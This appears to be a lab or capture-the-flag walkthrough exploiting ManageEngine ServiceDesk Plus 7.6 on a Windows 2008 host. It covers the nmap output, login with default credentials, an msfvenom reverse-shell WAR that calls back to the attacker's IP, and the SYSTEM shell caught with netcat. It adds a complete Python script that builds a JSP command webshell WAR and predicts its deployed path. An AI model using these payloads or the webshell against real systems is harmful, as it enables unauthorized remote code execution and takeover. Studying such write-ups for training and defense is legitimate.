Enumeration
Nmap Scan
$ nmap $ip -sVC -oN nmapInitial.txt -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-12 09:17 +0545
Nmap scan report for 192.168.80.43
Host is up (0.19s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
|_http-title: ManageEngine ServiceDesk Plus
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

The SMB banner identifies the host as Windows Server 2008 SP1 (build 6.0.6001), and port 8080 serves ManageEngine ServiceDesk Plus on its bundled Tomcat (Apache-Coyote/1.1). The web application on port 8080 accepts the default credentials administrator:administrator.
Exploitation
Zoho ManageEngine ServiceDesk Plus 7.6 has an authenticated arbitrary file upload vulnerability. With the default administrator login, the exploit script (manageengine_sd7-6.py) uploads a WAR file, and the bundled Tomcat runs the JSP payload inside it. Generate the WAR with msfvenom, start a listener on the chosen LPORT, then run the exploit:
$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.49.80 LPORT=445 -f war > shell.war
$ python3 ./manageengine_sd7-6.py $ip 8080 administrator administrator shell.war
$ rlwrap nc -nvlp 445
listening on [any] 445 ...
connect to [192.168.49.80] from (UNKNOWN) [192.168.80.43] 49196
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\ManageEngine\ServiceDesk\bin>whoami
whoami
nt authority\system

The ServiceDesk service runs as NT AUTHORITY\SYSTEM, so the uploaded payload lands directly as SYSTEM and no privilege escalation is needed.
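The reason an arbitrary file upload on a Tomcat-hosted application becomes code execution is that a WAR is just a zip archive Tomcat auto-deploys: anything under the context path that ends in .jsp is compiled and run on request. The following is an added example, not code from the original write-up or from the exploit script: it builds in memory the same kind of archive msfvenom -f war produces (a web.xml plus a JSP command shell; the file name cmd.jsp and the cmd parameter are assumptions), inspects an archive the way one would sanity-check a payload before upload or screen an upload on the defensive side, and applies Tomcat's context-naming rules to predict where the deployed JSP will be reachable.

```python
"""Build and inspect a WAR payload (added example; cmd.jsp and the 'cmd'
query parameter are assumed names, not taken from the original page)."""
import io
import zipfile

# Constructed JSP webshell: once deployed, GET /<context>/cmd.jsp?cmd=whoami
# runs the command and returns its stdout. Assumed content, for illustration.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""

# Minimal deployment descriptor; Tomcat deploys a WAR without one too, but
# a welcome-file makes the context root itself hit the shell.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <welcome-file-list><welcome-file>cmd.jsp</welcome-file></welcome-file-list>
</web-app>
"""


def build_war(jsp_name: str = "cmd.jsp", jsp_body: str = CMD_JSP) -> bytes:
    """Return the bytes of a WAR containing WEB-INF/web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr(jsp_name, jsp_body)
    return buf.getvalue()


def inspect_war(war: bytes) -> dict:
    """List what Tomcat would execute out of this archive: the descriptor,
    server-side scripts (.jsp/.jspx) and compiled classes. The same check,
    run on the server side, flags an uploaded 'attachment' that is really
    a deployable web application."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        names = z.namelist()
    return {
        "has_web_xml": "WEB-INF/web.xml" in names,
        "jsp": sorted(n for n in names if n.lower().endswith((".jsp", ".jspx"))),
        "classes": sorted(n for n in names if n.lower().endswith(".class")),
        "entries": names,
    }


def context_path(war_filename: str) -> str:
    """Tomcat maps the WAR file name to a context path:
    shell.war -> /shell, ROOT.war -> /, a#b.war -> /a/b."""
    base = war_filename[:-4] if war_filename.lower().endswith(".war") else war_filename
    if base == "ROOT":
        return "/"
    return "/" + base.replace("#", "/")


if __name__ == "__main__":
    war = build_war()
    with open("shell.war", "wb") as f:
        f.write(war)
    print(inspect_war(war))
    print("shell at", context_path("shell.war") + "/cmd.jsp")
```

Running the script writes shell.war to the current directory; uploaded as shell.war, the JSP would answer at /shell/cmd.jsp on the Tomcat port. The msfvenom WAR used on the page differs only in that its JSP has a randomized name and spawns the reverse shell on load instead of waiting for a cmd parameter.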